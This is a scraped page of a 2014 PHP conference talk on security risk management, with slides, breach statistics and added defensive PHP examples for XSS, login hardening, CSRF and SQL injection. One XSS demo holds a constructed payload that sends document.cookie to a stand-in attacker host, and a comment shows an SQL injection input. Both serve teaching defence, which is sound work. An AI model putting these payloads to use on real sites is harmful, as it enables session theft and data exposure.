Alison Gianotto
@snipeyhead

WHO AM I?
Alison Gianotto (aka “snipe”)
• Former agency CTO/CSO
• Security & privacy advocate
• 20 years in IT and software development
• Co-author of a few PHP/MySQL books
• Survivor of more corporate audits than I care to remember
• @snipeyhead on Twitter

Lonestar PHP - April 2014 - #lsp14
WHAT SECURITY ISN’T
1 Bolted on: You don’t add it on at the end.
2 Compliance: You can be compliant and not secure. Just ask Target.
3 A Single Person: Security is everyone’s responsibility.
4 Outsourced: Throwing money at this problem won’t work.
WHAT SECURITY ISN’T
5 An Appliance: Firewalls and IDS are part of the solution, but not the end.
6 Silver Bullet: There is no one thing. Defence in depth matters. Sort of.
7 Straightforward: Sometimes implementing security tools increases your attack surface.
8 Done: Security is where you start, not where you finish.
WHAT RISK ISN’T
1 Stifling: Managing risk doesn’t have to hinder innovation.
2 Boring: Our job is finding creative solutions to problems. This is one more tool.
3 Avoidable: Risk isn’t inherently bad. Not understanding your risk is.
4 One Size: Acceptable risk to your company may not be the same as someone else’s.
IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK.
Srsly.
DEFENSE IN DEPTH PROMISES
• Mitigates single points of failure. (“Bus factor”)
• Requires more effort on the part of the attacker, theoretically exhausting attacker resources.
Except...

DEFENSE IN DEPTH PROBLEMS
• Larger, more complicated systems are harder to maintain.
• Leads to more cracks for bad guys to poke at.
• More surfaces that can get overlooked.
• The bad guys have nearly limitless resources. We don’t.
• Attacks are commoditized now. Botnets for $2/hour.
CIA
Confidentiality, Integrity & Availability

CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION
CONFIDENTIALITY EXAMPLES
• Passwords. (boo!)
• Data encryption (at rest and in transmission.)
• Two-factor authentication/biometrics. (Yay!)
• Corporate VPN
• IP Whitelisting
• SSH keys
CONFIDENTIALITY RISKS
• No brute-force detection
• No vetting of how third-party vendors use/store customer data
• Information leakage from login messages (timing attacks, etc.)
• SQL injection
• Privilege escalation leading to admin access
• Passwords shared across websites
• Improper disposal/destruction of personal data
• Lost/stolen devices
INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE.
INTEGRITY RISKS
• Data loss due to hardware failure (server crash!)
• Software bug that unintentionally deletes/modifies data
• Data alteration via authorized persons (human error)
• Data alteration via unauthorized persons (hackers)
• No backups or no way to verify the integrity of the backups you have
• Third-party vendor with inadequate security
AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE.
AVAILABILITY RISKS
• DDoS attacks
• Third-party service failures
• Hardware failures
• Software bugs
• Untested software patches
• Natural disasters
• Man-made disasters
THINK YOU’RE TOO SMALL TO BOTHER WITH?
Think again.
WHY HACK?
• To steal/sell identities, credit card numbers, corporate secrets, military secrets
• Fun, Excitement and/or Notoriety
• Political (“Hacktivism”)
• Revenge
• Blackhat SEO
• Extortion/Ransomware
COMMON ATTACKS
• Reflected XSS
• Persistent XSS
• CSRF
• SQL Injection
• Remote file inclusion
• Local file inclusion/directory traversal
• Hosting malware
• Defacement for SEO (pharma, etc)
• Privilege escalation
WHY MEEEEEEEEEEEE??
• Users re-use passwords across websites
• Watering hole attack
• Low-hanging fruit
• Assumed fewer defenses
• To gain more information on users to execute spear-phishing attacks
• Because you are vulnerable. Period.
IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012.
Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
REFLECTED XSS
1 Social engineering
2 XSS
3 Session hijack
4 Pwned
77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY.
MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.

THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. (+700%)

OCT 2013: ADOBE
EXPOSED CUSTOMER DATA, DEBIT/CREDIT CARD NUMBERS, SOURCE
IMPACTED: 152 MILLION USERS
DEC 2013: TARGET
EXPOSED CUSTOMER DATA, DEBIT/CREDIT CARD NUMBERS, PINS
IMPACTED: 110 MILLION USERS
BREACH GROWTH
Data Stolen:
• credit card info
• birth dates
• government ID numbers
• home addresses
• medical records
• phone numbers
• financial information
• email addresses
• login
• passwords

Identities Stolen by Year (in Millions): 2011: 232; 2013: 552
ATTACKS PER DAY
2011: 190,000
2012: 464,000
2013: 570,000
APPSEC STRATEGY
PICK TWO:
• COMPLETELY BONED
• COMPLETELY BONED
• COMPLETELY BONED
CREATING A RISK MATRIX
• Type
• Third-Party
• Dataflow diagram ID
• Description
• Triggering Action
• Consequence of Service Failure
• Risk of Failure
• User Impact
• Method used for monitoring this risk
• Efforts to Mitigate in Case of Failure
• Contact info

Grab a starter template here! http://snipe.ly/risk_matrix
29 THINGS YOU CAN START DOING TODAY.
Dooo eeeeeet.

1. Start every project risk-first.
2. Start using a risk matrix for every major project or product.
3. Build a clear inventory of surface areas and their value. Get stakeholders involved.
4. Make sure you understand what happens when third-party services fail or behave unexpectedly.
5. Trust your gut. If something doesn’t look right, it probably isn’t.
6. Keep your systems as simple as possible. Document them.
7. Favor self-documenting systems so that code, systems and docs don't fall out of sync.
8. Increased transparency reduces risk across departments. Consider devops.
9. Don't abstract code/systems if you don’t have to. Premature optimization is the devil. Build light and refactor as needed.
10. Get to know your users’ behavior. Use tools like Google Analytics and heat-mapping to understand what users do on your site. Be suspicious if it changes for no apparent reason.
11. Automate EVERYTHING (Chef, Vagrant, Ansible, Salt, Fabric, etc.)
12. Log (almost!) EVERYTHING. Know where your logs are. Use a central logging server if at all possible.
13. Always employ the principles of “least privilege.”
14. Give preference to vendors that integrate with your AD/OD/LDAP.
15. Create a reliable data backup plan and TEST IT. (MORE THAN ONCE.)
16. Create a Business Continuity Plan.
17. Create an Incident Response Plan. Test it.
18. Create a Disaster Recovery Plan. TEST IT. (Seriously.)
19. Get your team to participate in at least one CTF every year.
20. Strip specific messaging from login forms.
21. Use solid password+salting like bcrypt.
22. Implement brute-force prevention for all login systems.
23. Encrypt everything, where feasible.
24. Only collect the data that you absolutely need.
25. Implement two-factor authentication. It’s easier than you think.
26. Suppress debugging and server information (PHP versions, Apache versions).
27. Leverage framework CSRF protection and data sanitization/validation.
28. Perform regular penetration tests and vulnerability assessments.
29. Become a passionate security ambassador for your users and co-workers.
  
	
  
CAPTURE ALL THE FLAGS!
• NotSoSecure CTF: http://cx.notsosecure.com
• Security Shepherd: https://www.owasp.org/index.php/OWASP_Security_Shepherd
• http://hax.tor.hu/
• https://pwn0.com/
• http://www.smashthestack.org/
• http://www.hellboundhackers.org/
• http://www.overthewire.org/wargames/
• http://counterhack.net/Counter_Hack/Challenges.html
• http://www.hackthissite.org/
• http://exploit-exercises.com/
• http://vulnhub.com/
THANK YOU!
Alison Gianotto (aka “snipe”)
• @snipeyhead on Twitter
• snipe@snipe.net

WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 

Dernier (20)

Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 

Former CTO Shares Tips on Security Risk Management

• 2. WHO AM I? Alison Gianotto (aka “snipe”)
  • Former agency CTO/CSO
  • Security & privacy advocate
  • 20 years in IT and software development
  • Co-author of a few PHP/MySQL books
  • Survivor of more corporate audits than I care to remember
  • @snipeyhead on Twitter
  Lonestar PHP - April 2014 - #lsp14
• 3. WHAT SECURITY ISN’T
  1. Bolted on: you don’t add it on at the end.
  2. Compliance: you can be compliant and not secure. Just ask Target.
  3. A single person: security is everyone’s responsibility.
  4. Outsourced: throwing money at this problem won’t work.
• 4. WHAT SECURITY ISN’T (continued)
  5. An appliance: firewalls and IDS are part of the solution, but not the end.
  6. Silver bullet: there is no one thing. Defence in depth matters. Sort of.
  7. Straightforward: sometimes implementing security tools increases your attack surface.
  8. Done: security is where you start, not where you finish.
• 5. WHAT RISK ISN’T
  1. Stifling: managing risk doesn’t have to hinder innovation.
  2. Boring: our job is finding creative solutions to problems. This is one more tool.
  3. Avoidable: risk isn’t inherently bad. Not understanding your risk is.
  4. One size: acceptable risk to your company may not be the same as someone else’s.
• 6. IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK. Srsly.
• 7. DEFENSE IN DEPTH PROMISES
  • Mitigates single points of failure. (“Bus factor”)
  • Requires more effort on the part of the attacker, theoretically exhausting attacker resources.
  Except...
• 8. DEFENSE IN DEPTH PROBLEMS
  • Larger, more complicated systems are harder to maintain.
  • Leads to more cracks for bad guys to poke at.
  • More surfaces that can be overlooked.
  • The bad guys have nearly limitless resources. We don’t.
  • Attacks are commoditized now. Botnets for $2/hour.
• 10. CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION.
• 11. CONFIDENTIALITY EXAMPLES
  • Passwords. (boo!)
  • Data encryption (at rest and in transmission).
  • Two-factor authentication/biometrics. (Yay!)
  • Corporate VPN
  • IP whitelisting
  • SSH keys
• 12. CONFIDENTIALITY RISKS
  • No brute-force detection
  • No vetting of how third-party vendors use/store customer data
  • Information leakage from login messages (timing attacks, etc.)
  • SQL injection
  • Privilege escalation leading to admin access
  • Passwords shared across websites
  • Improper disposal/destruction of personal data
  • Lost/stolen devices
• 13. INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE.
• 14. INTEGRITY RISKS
  • Data loss due to hardware failure (server crash!)
  • Software bug that unintentionally deletes/modifies data
  • Data alteration via authorized persons (human error)
  • Data alteration via unauthorized persons (hackers)
  • No backups, or no way to verify the integrity of the backups you have
  • Third-party vendor with inadequate security
• 15. AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE.
• 16. AVAILABILITY RISKS
  • DDoS attacks
  • Third-party service failures
  • Hardware failures
  • Software bugs
  • Untested software patches
  • Natural disasters
  • Man-made disasters
• 17. THINK YOU’RE TOO SMALL TO BOTHER WITH? Think again.
• 18. WHY HACK?
  • To steal/sell identities, credit card numbers, corporate secrets, military secrets
  • Fun, excitement and/or notoriety
  • Political (“hacktivism”)
  • Revenge
  • Blackhat SEO
  • Extortion/ransomware
• 19. COMMON ATTACKS
  • Reflected XSS
  • Persistent XSS
  • CSRF
  • SQL injection
  • Remote file inclusion
  • Local file inclusion/directory traversal
  • Hosting malware
  • Defacement for SEO (pharma, etc.)
  • Privilege escalation
• 20. WHY MEEEEEEEEEEEE??
  • Users re-use passwords across websites
  • Watering hole attack
  • Low-hanging fruit
  • Assumed fewer defenses
  • To gain more information on users to execute spear-phishing attacks
  • Because you are vulnerable. Period.
• 21. IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012. Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 22. REFLECTED XSS, the chain: 1 Social engineering → 2 XSS → 3 Session hijack → 4 Pwned
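The chain on slide 22, as an added PHP example that is not code from the talk: the reflected echo that makes step 2 possible beside its escaped replacement, and the session cookie settings that stop step 3 (a cookie that JavaScript cannot read cannot be exfiltrated by the injected script). The function names and the attacker payload are constructed for the demonstration; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added example (not from the slides): breaking the slide-22 chain at two points.
// Reflected XSS is stopped by escaping on output; hijacking a stolen session
// cookie is made much harder by marking it HttpOnly, Secure and SameSite and by
// rotating the session ID on login. Array-style cookie options need PHP 7.3+.
declare(strict_types=1);

// VULNERABLE: the search term from the URL goes straight into the page.
// A crafted link such as ?q=<script>...</script> mailed to a victim
// (social engineering) runs in the victim's browser with the victim's session.
function renderSearchVulnerable(string $q): string
{
    return "<p>Results for: $q</p>";
}

// FIXED: escape on output, for the context being written into (HTML body).
// ENT_QUOTES also escapes ' and " so the same helper is safe inside attributes.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderSearchSafe(string $q): string
{
    return '<p>Results for: ' . esc($q) . '</p>';
}

// Session cookie hardening. Call this before session_start().
function hardenSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // session cookie: gone when the browser closes
        'path'     => '/',
        'secure'   => true,     // never sent over plain HTTP
        'httponly' => true,     // document.cookie cannot read it, so XSS cannot steal it
        'samesite' => 'Lax',    // not sent on cross-site POSTs (also helps against CSRF)
    ]);
    ini_set('session.use_strict_mode', '1'); // reject session IDs the server never issued
}

// After a successful login, rotate the ID so a session fixated or captured
// before authentication is worthless afterwards.
function onLoginSuccess(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id'] = $userId;
}

// Demonstration with a constructed cookie-stealing payload (run from the CLI;
// no session is started here, so only the rendering functions are exercised).
$payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
echo renderSearchVulnerable($payload), "\n";  // script tag reaches the browser intact
echo renderSearchSafe($payload), "\n";        // rendered as text: &lt;script&gt;...
```

HttpOnly only removes the cookie from the attacker's reach; a script that runs in the victim's page can still send requests as the victim, so escaping output is the fix and the cookie flags are the second layer.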
• 23. 77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY. Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 24. MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT.
• 25. THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. (+700%) Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 26. OCT 2013: ADOBE EXPOSED CUSTOMER DATA, DEBIT/CREDIT CARD NUMBERS, SOURCE. IMPACTED: 152 MILLION USERS. Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 27. DEC 2013: TARGET EXPOSED CUSTOMER DATA, DEBIT/CREDIT CARD NUMBERS, PINS. IMPACTED: 110 MILLION USERS. Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 28. BREACH GROWTH
  Data stolen: credit card info, birth dates, government ID numbers, home addresses, medical records, phone numbers, financial information, email addresses, logins, passwords.
  Identities stolen by year (in millions): 2011: 232; 2013: 552.
  Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 29. ATTACKS PER DAY: 2011: 190,000; 2012: 464,000; 2013: 570,000. Source: Symantec Internet Security Threat Report 2014 :: Volume 19, Published April 2014
• 30. APPSEC STRATEGY: PICK TWO. The three options on offer: COMPLETELY BONED, COMPLETELY BONED, COMPLETELY BONED.
• 31. CREATING A RISK MATRIX. One row per risk, with these columns:
  • Type
  • Third-party
  • Dataflow diagram ID
  • Description
  • Triggering action
  • Consequence of service failure
  • Risk of failure
  • User impact
  • Method used for monitoring this risk
  • Efforts to mitigate in case of failure
  • Contact info
  Grab a starter template here! http://snipe.ly/risk_matrix
• 32. 29 THINGS YOU CAN START DOING TODAY. Dooo eeeeeet.
• 33. 29 THINGS TO DO TODAY
  1. Start every project risk-first.
  2. Start using a risk matrix for every major project or product.
  3. Build a clear inventory of surface areas and their value. Get stakeholders involved.
  4. Make sure you understand what happens when third-party services fail or behave unexpectedly.
• 34. 29 THINGS TO DO TODAY (continued)
  5. Trust your gut. If something doesn’t look right, it probably isn’t.
  6. Keep your systems as simple as possible. Document them.
  7. Favor self-documenting systems so that code, systems and docs don’t fall out of sync.
  8. Increased transparency reduces risk across departments. Consider devops.
• 35. 29 THINGS TO DO TODAY (continued)
  9. Don’t abstract code/systems if you don’t have to. Premature optimization is the devil. Build light and refactor as needed.
  10. Get to know your users’ behavior. Use tools like Google Analytics and heat-mapping to understand what users do on your site. Be suspicious if it changes for no apparent reason.
• 36. 29 THINGS TO DO TODAY (continued)
  11. Automate EVERYTHING (Chef, Vagrant, Ansible, Salt, Fabric, etc.)
  12. Log (almost!) EVERYTHING. Know where your logs are. Use a central logging server if at all possible.
  13. Always employ the principle of least privilege.
  14. Give preference to vendors that integrate with your AD/OD/LDAP.
• 37. 29 THINGS TO DO TODAY (continued)
  15. Create a reliable data backup plan and TEST IT. (MORE THAN ONCE.)
  16. Create a Business Continuity Plan.
  17. Create an Incident Response Plan. Test it.
  18. Create a Disaster Recovery Plan. TEST IT. (Seriously.)
  19. Get your team to participate in at least one CTF every year.
• 38. 29 THINGS TO DO TODAY (continued)
  20. Strip specific messaging from login forms: one generic “invalid username or password” response, whether or not the account exists.
  21. Use a proper salted, slow password hash like bcrypt (it generates and stores the salt for you).
  22. Implement brute-force prevention for all login systems.
  23. Encrypt everything, where feasible.
  24. Only collect the data that you absolutely need.
  25. Implement two-factor authentication. It’s easier than you think.
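Items 20 to 22 above, plus the timing leak listed under confidentiality risks on slide 12, written out as a working login routine. This is an added example and not code from the talk; the username, the in-memory user and attempt tables and the lockout numbers are constructed for the demonstration, and it needs PHP 7.1 or later.

```php
<?php
// Added example (not from the slides): a login routine that follows items
// 20-22 (generic failure message, bcrypt, brute-force throttling) and closes
// the timing leak from slide 12. Needs PHP 7.1+ (password_hash(),
// random_bytes(), short list syntax). The user table and the attempt counter
// are plain arrays here only so the script runs stand-alone; in production
// they live in a database or cache shared by all web workers.
declare(strict_types=1);

const MAX_ATTEMPTS    = 5;    // failures allowed per account per window
const LOCKOUT_SECONDS = 900;  // 15-minute lockout once the limit is hit

// Constructed user table: store the bcrypt hash, never the plaintext.
$users = [
    'alice' => ['hash' => password_hash('correct horse battery staple', PASSWORD_BCRYPT)],
];

// Constructed attempt log: username => [failure count, time of first failure].
$attempts = [];

// Hash of a throwaway secret, made once at startup. For unknown usernames
// password_verify() still runs against this, so the response time does not
// reveal which usernames exist.
$dummyHash = password_hash(bin2hex(random_bytes(16)), PASSWORD_BCRYPT);

function isLockedOut(array &$attempts, string $user, int $now): bool
{
    if (!isset($attempts[$user])) {
        return false;
    }
    [$count, $since] = $attempts[$user];
    if ($now - $since > LOCKOUT_SECONDS) {
        unset($attempts[$user]);      // window expired; start counting afresh
        return false;
    }
    return $count >= MAX_ATTEMPTS;
}

function recordFailure(array &$attempts, string $user, int $now): void
{
    if (!isset($attempts[$user])) {
        $attempts[$user] = [1, $now];
    } else {
        $attempts[$user][0]++;
    }
}

// Returns [success, message]. The message is the same generic one whether the
// username is unknown, the password is wrong or the account is locked; the
// specific reason goes to the server log only.
function login(array &$users, array &$attempts, string $dummyHash,
               string $user, string $password, int $now): array
{
    $generic = 'Invalid username or password.';

    if (isLockedOut($attempts, $user, $now)) {
        error_log("login: '$user' is locked out");
        return [false, $generic];
    }

    $known = isset($users[$user]);
    $hash  = $known ? $users[$user]['hash'] : $dummyHash;  // always verify something
    $ok    = password_verify($password, $hash) && $known;

    if (!$ok) {
        recordFailure($attempts, $user, $now);
        error_log("login: bad credentials for '$user'");
        return [false, $generic];
    }

    unset($attempts[$user]);   // a successful login clears the counter
    if (password_needs_rehash($hash, PASSWORD_BCRYPT)) {
        // bcrypt cost changed since this hash was made: upgrade it while the
        // plaintext is in hand.
        $users[$user]['hash'] = password_hash($password, PASSWORD_BCRYPT);
    }
    return [true, 'Welcome.'];
}

// Usage: six bad guesses, then the right password during and after the lockout.
$now = time();
for ($i = 1; $i <= MAX_ATTEMPTS + 1; $i++) {
    [$ok, $msg] = login($users, $attempts, $dummyHash, 'alice', 'wrong', $now);
    echo "attempt $i: $msg\n";
}
[$ok, $msg] = login($users, $attempts, $dummyHash, 'alice', 'correct horse battery staple', $now);
echo 'during lockout: ', $ok ? 'accepted' : 'rejected', "\n";   // rejected
[$ok, $msg] = login($users, $attempts, $dummyHash, 'alice', 'correct horse battery staple', $now + LOCKOUT_SECONDS + 1);
echo 'after lockout: ', $ok ? 'accepted' : 'rejected', "\n";    // accepted
```

A per-account counter like this stops a password-guessing run against one user; pair it with a per-source-IP limit so one attacker cannot lock every account out on purpose, and keep the counters somewhere all your web workers can see.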
• 39. 29 THINGS TO DO TODAY (continued)
  26. Suppress debugging and server information (PHP versions, Apache versions): expose_php = Off and display_errors = Off in php.ini, ServerTokens Prod and ServerSignature Off in Apache.
  27. Leverage framework CSRF protection and data sanitization/validation.
  28. Perform regular penetration tests and vulnerability assessments.
  29. Become a passionate security ambassador for your users and co-workers.
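What item 27 asks the framework to do, shown without a framework, together with the parameterised query that takes the SQL injection from slides 12 and 19 off the table. This is an added example and not the author's code; the SQLite table, the session array and the function names are constructed for the demonstration, and the pdo_sqlite extension must be loaded for it to run.

```php
<?php
// Added example (not from the slides): a framework's CSRF middleware and
// "validate, then parameterize" advice, written out by hand. Uses an
// in-memory SQLite database via PDO so it runs stand-alone (needs pdo_sqlite).
// The PHP session is replaced by a plain array so it runs from the CLI.
declare(strict_types=1);

// --- CSRF: synchronizer token pattern --------------------------------------
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];   // emit this as a hidden field in every form
}

function csrfCheck(array $session, ?string $submitted): bool
{
    if ($submitted === null || empty($session['csrf_token'])) {
        return false;
    }
    // hash_equals() compares in constant time, so response timing does not
    // let an attacker recover the token byte by byte.
    return hash_equals($session['csrf_token'], $submitted);
}

// --- Validation: accept only what the field is supposed to hold ------------
function validateEmail(string $raw): ?string
{
    $email = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

// --- SQL: bound parameters, never string interpolation ---------------------
function findUserByEmail(PDO $db, string $email): ?array
{
    // VULNERABLE version, for comparison only:
    //   $db->query("SELECT id, email FROM users WHERE email = '$email'");
    // An input of  x' OR '1'='1  would return every row.
    $stmt = $db->prepare('SELECT id, email FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Handles a form POST in the order a framework would: token, validation, query.
function handleProfileLookup(PDO $db, array $session, array $post): string
{
    if (!csrfCheck($session, $post['csrf_token'] ?? null)) {
        return 'rejected: bad or missing CSRF token';
    }
    $email = validateEmail($post['email'] ?? '');
    if ($email === null) {
        return 'rejected: not a valid e-mail address';
    }
    $user = findUserByEmail($db, $email);
    return $user === null ? 'no such user' : "user #{$user['id']}";
}

// --- Demonstration with constructed data -----------------------------------
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE)');
$db->exec("INSERT INTO users (email) VALUES ('alice@example.com'), ('bob@example.com')");

$session = [];
$token = csrfToken($session);

echo handleProfileLookup($db, $session, ['email' => 'alice@example.com']), "\n";                           // no token
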